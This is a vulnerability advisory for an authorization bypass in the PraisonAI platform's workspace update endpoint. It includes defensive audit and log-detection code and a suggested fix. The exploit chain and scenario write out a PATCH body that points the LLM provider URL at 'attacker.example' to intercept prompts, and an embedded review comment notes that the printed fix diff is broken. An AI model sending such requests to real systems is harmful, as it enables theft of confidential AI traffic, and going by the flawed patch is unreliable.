CVE-2026-47411: PraisonAI: auth bypass allows workspace settings injection

GHSA-rcmc-q9rj-4wmq MEDIUM
Published June 1, 2026
CISO Take

Any authenticated workspace member in PraisonAI platform can overwrite the workspace name, description, and free-form settings JSON blob with a single PATCH request — no owner privileges required, just a valid member JWT. The real concern is not metadata defacement: the settings blob drives downstream platform behavior including LLM provider endpoints, webhook routing, and feature flags. A malicious insider or compromised member account can silently redirect all AI inference traffic in the workspace to an attacker-controlled proxy, intercepting every prompt and response without any indication to workspace owners. Exploitation requires no technical sophistication beyond a standard HTTP client. Organizations running praisonai-platform should upgrade to 0.1.4 immediately and audit current workspace settings for anomalous provider URLs or webhook endpoints.

Sources: GitHub Advisory NVD ATLAS

What is the risk?

Medium by CVSS but with outsized potential impact in multi-tenant AI agent deployments. Exploitation is trivial — a single authenticated PATCH from the lowest privilege tier. The free-form settings blob is the real risk amplifier: whatever the platform reads from that field becomes attacker-controllable, including LLM provider endpoints that govern where all AI inference traffic flows. The package has 65 other CVEs on record, indicating a systemic pattern of security debt in PraisonAI. While not in CISA KEV and EPSS data is unavailable, triviality of exploitation combined with potential for confidential AI conversation interception elevates practical risk well beyond the raw 6.5 CVSS score in any deployment handling sensitive AI workloads.

Attack Kill Chain

Initial Access (AML.T0012)
Attacker obtains a valid workspace member JWT through legitimate onboarding, credential theft, or insider access — no elevated privileges required.

Authorization Bypass (AML.T0049)
Attacker sends PATCH /workspaces/{id}; the require_workspace_member check passes for any member role, skipping the owner-only gate that should protect this endpoint.

Configuration Injection (AML.T0081)
Attacker writes arbitrary values into the workspace settings JSON blob — redirecting ai_provider_url to attacker infrastructure and toggling feature flags such as public invite.

AI Traffic Interception (AML.T0025)
All subsequent LLM inference calls from agents in the compromised workspace route through the attacker's proxy, enabling silent capture of all prompts and responses.

What systems are affected?

Package: praisonai-platform
Ecosystem: pip
Vulnerable range: < 0.1.4
Patched: 0.1.4
1 dependent, 86% patched, ~0d to patch


Severity & Risk

CVSS 3.1: 6.5 / 10
EPSS: N/A
Exploitation Status: No known exploitation
Sophistication: Trivial

Attack Surface

AV (Attack Vector): Network
AC (Attack Complexity): Low
PR (Privileges Required): Low
UI (User Interaction): None
S (Scope): Unchanged
C (Confidentiality): None
I (Integrity): High
A (Availability): None

What should I do?

5 steps
  1. Patch immediately: upgrade to praisonai-platform 0.1.4 which corrects the authorization check on PATCH /workspaces/{id} to require owner role.

  2. Until patched: treat workspace membership as equivalent to admin access and restrict it to fully trusted personnel only.

  3. Detection: monitor HTTP logs for PATCH requests to /workspaces/ paths, especially from member-role accounts; alert on any changes to workspace name or settings fields.

  4. Remediation: audit all current workspace settings JSON blobs for anomalous values — specifically any provider_url, ai_provider_url, webhook_url, or similar endpoint fields pointing to unexpected external domains.

  5. Defense-in-depth post-patch: validate settings keys against an allowlist in WorkspaceService.update() so the field cannot become an arbitrary config-injection primitive even for owners, as advised in the upstream fix.
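As an added example (not code from the PraisonAI project or from the advisory), the Python below implements the settings audit of step 4 and the owner gate plus settings-key allowlist of step 5 against constructed workspace blobs. The allowlisted key names, the trusted hosts, the two-level role ranking and the `_url`/`_endpoint` naming heuristic are assumptions for this example; a real deployment would derive them from whatever its own code reads out of `settings`.

```python
from urllib.parse import urlparse

# Hypothetical allowlist: the settings keys this deployment's code actually reads.
# Anything else is rejected rather than stored.
SETTINGS_KEY_ALLOWLIST = frozenset({"ai_provider_url", "webhook_url", "allow_public_invite"})

# Hypothetical allowlist of hosts that endpoint-valued settings may point at.
TRUSTED_ENDPOINT_HOSTS = frozenset({"llm-gateway.internal.example", "hooks.internal.example"})

# Minimal role ranking for the example; PraisonAI's MemberService.has_role is not reproduced.
ROLE_RANK = {"member": 1, "owner": 2}


class SettingsValidationError(ValueError):
    """Raised when a settings update contains unknown keys or untrusted endpoints."""


def has_min_role(role, min_role):
    """True when `role` is at or above `min_role` in ROLE_RANK; unknown roles never pass."""
    return role in ROLE_RANK and min_role in ROLE_RANK and ROLE_RANK[role] >= ROLE_RANK[min_role]


def is_endpoint_key(key):
    """Heuristic for fields that hold URLs (provider_url, ai_provider_url, webhook_url, ...)."""
    return key.endswith("_url") or key.endswith("_endpoint")


def audit_settings(settings, trusted_hosts=TRUSTED_ENDPOINT_HOSTS):
    """Return (key, reason) findings for endpoint-like fields that are not https
    or do not point at a trusted host. An empty list means the blob looks clean."""
    findings = []
    for key, value in settings.items():
        if not is_endpoint_key(key):
            continue
        if not isinstance(value, str):
            findings.append((key, "endpoint value is not a string"))
            continue
        parsed = urlparse(value)
        if parsed.scheme != "https":
            findings.append((key, f"non-https scheme {parsed.scheme!r}"))
        if parsed.hostname not in trusted_hosts:
            findings.append((key, f"untrusted host {parsed.hostname!r}"))
    return findings


def audit_all(workspaces, trusted_hosts=TRUSTED_ENDPOINT_HOSTS):
    """Audit every workspace's settings blob; return only the workspaces with findings."""
    report = {}
    for workspace_id, settings in workspaces.items():
        findings = audit_settings(settings, trusted_hosts)
        if findings:
            report[workspace_id] = findings
    return report


def apply_settings_update(caller_role, current_settings, update,
                          allowlist=SETTINGS_KEY_ALLOWLIST, trusted_hosts=TRUSTED_ENDPOINT_HOSTS):
    """Hardened update path: owner role required, unknown keys rejected,
    endpoint values checked, then the update is merged into the current blob."""
    if not has_min_role(caller_role, "owner"):
        raise PermissionError(f"role {caller_role!r} may not modify workspace settings")
    if not isinstance(update, dict):
        raise SettingsValidationError("settings must be a JSON object")
    unknown = sorted(set(update) - allowlist)
    if unknown:
        raise SettingsValidationError(f"unknown settings keys: {unknown}")
    findings = audit_settings(update, trusted_hosts)
    if findings:
        raise SettingsValidationError("; ".join(f"{k}: {why}" for k, why in findings))
    merged = dict(current_settings)
    merged.update(update)
    return merged


# Constructed sample data, not real workspace contents.
SAMPLE_WORKSPACES = {
    "finance-ws-001": {"ai_provider_url": "https://attacker.example/v1", "allow_public_invite": True},
    "eng-ws-002": {"ai_provider_url": "https://llm-gateway.internal.example/v1",
                   "webhook_url": "https://hooks.internal.example/ingest"},
    "ops-ws-003": {"webhook_url": "http://hooks.internal.example/ingest"},
}

if __name__ == "__main__":
    for ws_id, findings in audit_all(SAMPLE_WORKSPACES).items():
        for key, reason in findings:
            print(f"{ws_id}: {key}: {reason}")
```

Running the file prints the findings for the constructed workspaces: the `finance-ws-001` provider URL points at an untrusted host and the `ops-ws-003` webhook is plain http. `apply_settings_update` is the shape of check that belongs in front of `WorkspaceService.update()`: the role gate closes the bypass itself, and the key allowlist keeps the blob from being an open configuration surface even for owners.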

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act: Article 9 - Risk management system
ISO 42001: 6.1.2 - AI risk assessment
NIST AI RMF: MANAGE 2.2 - Mechanisms to neutralize identified AI risks
OWASP LLM Top 10: LLM07 - Insecure Plugin Design

Frequently Asked Questions

Is CVE-2026-47411 actively exploited?

No confirmed active exploitation of CVE-2026-47411 has been reported, but organizations should still patch proactively.

What systems are affected by CVE-2026-47411?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, multi-tenant AI platforms, LLM API proxy configurations.

What is the CVSS score for CVE-2026-47411?

CVE-2026-47411 has a CVSS v3.1 base score of 6.5 (MEDIUM).

AI Security Impact

Affected AI Architectures

agent frameworks, multi-tenant AI platforms, LLM API proxy configurations

MITRE ATLAS Techniques

AML.T0012 Valid Accounts
AML.T0025 Exfiltration via Cyber Means
AML.T0049 Exploit Public-Facing Application
AML.T0081 Modify AI Agent Configuration

Compliance Controls Affected

EU AI Act: Article 9
ISO 42001: 6.1.2
NIST AI RMF: MANAGE 2.2
OWASP LLM Top 10: LLM07

Technical Details

Original Advisory

## Summary

**Type:** Authorization bypass enabling workspace metadata + settings tampering.

The `PATCH /workspaces/{workspace_id}` endpoint is gated only by `require_workspace_member(workspace_id)` (default `min_role="member"`). Any member can rewrite the workspace's `name`, `description`, and the `settings` JSON blob. The settings field is a free-form JSON object — depending on which downstream code reads it, this becomes a configuration-injection primitive for any setting the platform exposes there.

**File:** `src/praisonai-platform/praisonai_platform/api/routes/workspaces.py`, lines 63-74; `services/workspace_service.py`'s `update()` method.

**Root cause:** `Depends(require_workspace_member)` resolves to default `min_role="member"`. `WorkspaceService.update(workspace_id, name, description, settings)` writes the new fields to the workspace row without any caller-permission check. The role hierarchy (`MemberService.has_role`) is never consulted.

## Affected Code

**File:** `src/praisonai-platform/praisonai_platform/api/routes/workspaces.py`, lines 63-74.

```python
@router.patch("/{workspace_id}", response_model=WorkspaceResponse)
async def update_workspace(
    workspace_id: str,
    body: WorkspaceUpdate,
    user: AuthIdentity = Depends(require_workspace_member),  # <-- BUG: defaults to min_role="member"
    session: AsyncSession = Depends(get_db),
):
    ws_svc = WorkspaceService(session)
    ws = await ws_svc.update(workspace_id, body.name, body.description, body.settings)  # <-- writes any value
    if ws is None:
        raise HTTPException(status_code=404, detail="Workspace not found")
    return WorkspaceResponse.model_validate(ws)
```

**Why it's wrong:** workspace name and settings are owner-tier fields. Renaming the workspace to a profanity is a low-impact griefing vector; rewriting the JSON `settings` blob is potentially a much higher-impact configuration injection (depending on what fields downstream code reads from `settings`, the attacker may flip feature flags, redirect webhook URLs, change LLM provider keys for shared configs, disable audit logging, etc.). The `require_workspace_member(min_role)` parameter is implemented and unused. This endpoint should require owner.

## Exploit Chain

1. Attacker is a member of workspace `W` with role "member". State: attacker holds JWT.
2. Attacker sends `PATCH /workspaces/W` with `Authorization: Bearer <attacker_jwt>` and body `{"name": "Compromised", "description": "Owned by attacker", "settings": {"allow_public_invite": true, "ai_provider_url": "https://attacker.example/v1"}}`. State: control flow enters `update_workspace`.
3. `require_workspace_member(W, attacker)` passes. `WorkspaceService.update(W, ...)` writes the three fields. State: workspace `W` now has attacker-chosen name, description, and settings.
4. The settings JSON is read by any downstream code that consults workspace settings (LLM proxying, invite flows, webhook routing). If the deployment uses settings-keyed configuration overrides, those overrides now point at attacker-controlled endpoints.
5. Final state: with one member-level token plus one PATCH, the attacker rewrites the workspace's metadata and settings, with effects ranging from cosmetic (rename) to substantive (settings-keyed config injection).

## Security Impact

**Severity:** sec-moderate. CVSS 6.5: network attack, low complexity, low privileges, no user interaction, scope unchanged, no confidentiality directly (though settings rewrites may enable indirect data exfiltration via attacker-pointed integration URLs), high integrity, no availability claim.

**Attacker capability:** rewrite any workspace's name, description, and settings JSON. The actual blast radius depends on what fields the deployment reads from `settings` — but that field is documented as a free-form JSON blob, so any future configuration the platform adds there becomes attacker-tunable.

**Preconditions:** `praisonai-platform` is deployed multi-tenant; attacker has any membership token in the target workspace.

**Differential:** source-inspection-verified. With the suggested fix below, member-tier tokens fail the gate and the metadata rewrite is rejected with 403.

## Suggested Fix

```diff
--- a/src/praisonai-platform/praisonai_platform/api/routes/workspaces.py
+++ b/src/praisonai-platform/praisonai_platform/api/routes/workspaces.py
@@ -63,11 +63,11 @@
 @router.patch("/{workspace_id}", response_model=WorkspaceResponse)
 async def update_workspace(
     workspace_id: str,
     body: WorkspaceUpdate,
-    user: AuthIdentity = Depends(require_workspace_member),
+    user: AuthIdentity = Depends(_require_workspace_owner),  # see member-update-role advisory for helper
     session: AsyncSession = Depends(get_db),
 ):
     ws_svc = WorkspaceService(session)
     ws = await ws_svc.update(workspace_id, body.name, body.description, body.settings)
     if ws is None:
         raise HTTPException(status_code=404, detail="Workspace not found")
     return WorkspaceResponse.model_validate(ws)
```

Defence-in-depth: validate the keys allowed in `body.settings` against an allowlist so the field cannot become an arbitrary config-injection primitive even for owners. The four companion workspace-mutation endpoints (`add_member`, `update_member_role`, `remove_member`, `delete_workspace`) exhibit the same default-min-role gap and are filed as their own advisories.
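Review bot: `_require_workspace_owner` in the `+` line is not defined anywhere in this diff; the inline comment defers to a helper from the member-update-role advisory, so the hunk does not import on its own. Either include that helper in the same change or, since the advisory itself states that `require_workspace_member(min_role)` is already implemented and unused, gate the route through that existing `min_role` parameter so the fix is self-contained. The hunk header `@@ -63,11 +63,11 @@` also counts 11 lines per side, while the body shows 12 on each side (11 context lines plus the one removed or added line) for the stated range 63-74, so the patch will not apply cleanly as written. Finally, the settings-key allowlist recommended in the defence-in-depth paragraph is not part of the hunk: `ws_svc.update(workspace_id, body.name, body.description, body.settings)` still receives `body.settings` unchecked, so the configuration-injection surface remains open to owners after this patch.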

Exploitation Scenario

A contractor with workspace member access at a firm running PraisonAI for internal AI workflows sends a single curl command: PATCH /workspaces/finance-ws-001 with body {"settings": {"ai_provider_url": "https://attacker.example/v1", "allow_public_invite": true}}. All subsequent LLM calls from agents in that workspace — including those processing confidential client data — route through the attacker's proxy, which logs every prompt and response while transparently forwarding to the real provider. The workspace owner sees no indication of the change without explicitly inspecting the settings object. The attacker simultaneously enables public invites, expanding their foothold. The entire attack completes in under 60 seconds and leaves no application-layer alert.
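The scenario above ends with no application-layer alert. As an added example (not part of the advisory or the PraisonAI project), the detector below implements the step 3 monitoring recommendation over constructed, JSON-lines request-log entries: every PATCH under /workspaces/ is surfaced, a successful PATCH from a non-owner token is rated high (the bypass in action), a 403 from a non-owner is rated medium (an attempt the patched gate blocked), and owner changes are kept at info so the settings change itself is still reviewable. The log field names, including the assumed `role` field written by the application after authentication, are assumptions for this example.

```python
import json
import re

# Matches /workspaces/{id} and its companion sub-routes (members, etc.).
WORKSPACE_PATH_RE = re.compile(r"^/workspaces/(?P<workspace_id>[^/?]+)(?P<subpath>/[^?]*)?")

# Constructed structured request-log lines, one JSON object per line.
# The `role` field is assumed to be emitted by the application after it resolves the JWT.
SAMPLE_LOG = """\
{"ts":"2026-06-01T10:00:01Z","method":"GET","path":"/workspaces/finance-ws-001","status":200,"sub":"u-17","role":"member"}
{"ts":"2026-06-01T10:00:05Z","method":"PATCH","path":"/workspaces/finance-ws-001","status":200,"sub":"u-17","role":"member"}
{"ts":"2026-06-01T10:00:09Z","method":"PATCH","path":"/workspaces/finance-ws-001","status":200,"sub":"u-02","role":"owner"}
{"ts":"2026-06-01T10:00:12Z","method":"PATCH","path":"/workspaces/eng-ws-002","status":403,"sub":"u-31","role":"member"}
{"ts":"2026-06-01T10:00:15Z","method":"POST","path":"/workspaces/eng-ws-002/members","status":201,"sub":"u-02","role":"owner"}
not a json line
"""


def classify(event):
    """Return an alert dict for a PATCH under /workspaces/, or None for anything else."""
    if event.get("method") != "PATCH":
        return None
    match = WORKSPACE_PATH_RE.match(event.get("path", ""))
    if not match:
        return None
    try:
        status = int(event.get("status", 0))
    except (TypeError, ValueError):
        status = 0
    succeeded = 200 <= status < 300
    role = event.get("role", "unknown")
    if role != "owner" and succeeded:
        severity = "high"      # non-owner rewrote workspace metadata/settings: the CVE in action
    elif role != "owner":
        severity = "medium"    # non-owner attempt that the gate rejected: probing for the bug
    else:
        severity = "info"      # owner changes are legitimate but still worth a settings review
    return {
        "ts": event.get("ts"),
        "workspace_id": match.group("workspace_id"),
        "subpath": match.group("subpath") or "",
        "sub": event.get("sub"),
        "role": role,
        "status": status,
        "severity": severity,
    }


def scan_log(text):
    """Parse JSON-lines request logs and return alerts in log order.
    Malformed lines are skipped so one bad record cannot stall the detector."""
    alerts = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        alert = classify(event)
        if alert is not None:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"[{alert['severity']}] {alert['ts']} sub={alert['sub']} role={alert['role']} "
              f"PATCH /workspaces/{alert['workspace_id']}{alert['subpath']} -> {alert['status']}")
```

Feeding the constructed log through `scan_log` yields three alerts: the member's successful PATCH on finance-ws-001 (high), the owner's own PATCH (info), and the blocked member attempt on eng-ws-002 (medium). On a pre-patch deployment the high alert is the only application-side signal that the settings blob was rewritten, which is why pairing this with the settings audit in the remediation steps matters.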

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Timeline

Published: June 1, 2026
Last Modified: June 1, 2026
First Seen: June 1, 2026
